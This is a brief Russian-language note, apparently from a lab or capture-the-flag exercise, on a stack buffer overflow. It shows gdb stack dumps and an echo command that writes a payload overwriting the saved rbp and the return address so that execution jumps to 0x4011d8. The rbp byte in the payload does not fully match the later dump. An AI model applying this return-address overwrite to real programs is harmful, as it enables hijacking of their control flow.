0x7fffffffdd30:	0x00	0x00	0x00	0x00	0x74	0x74	0x74	0x74 <-- rsp
0x7fffffffdd38:	0x74	0x74	0x74	0x74	0x74	0x74	0x74	0x74
0x7fffffffdd40:	0x00	0xdd	0xff	0xff	0xff	0x7f	0x00	0x00 <-- rbp текущей функции и сохранённый rbp
0x7fffffffdd48:	0xb6	0x11	0x40	0x00	0x00	0x00	0x00	0x00 <-- адрес возврата (вот сюда нам не надо)

0x00000000004011d8 <-- вот сюда нам надо

для перезаписи rbp и адреса возврата:
echo -e "\x74\x74\x74\x74\x74\x74\x74\x74\x74\x74\x74\x74\x60\xdd\xff\xff\xff\x7f\x00\x00\xd8\x11\x40\x00\x00\x00\x00\x00" > passw.txt

(12 символов 't' и 2 адреса по 8 байт)

0x7fffffffdd30:	0x00	0x00	0x00	0x00	0x74	0x74	0x74	0x74
0x7fffffffdd38:	0x74	0x74	0x74	0x74	0x74	0x74	0x74	0x74
0x7fffffffdd40:	0x00	0xdd	0xff	0xff	0xff	0x7f	0x00	0x00
0x7fffffffdd48:	0xd8	0x11	0x40	0x00	0x00	0x00	0x00	0x00
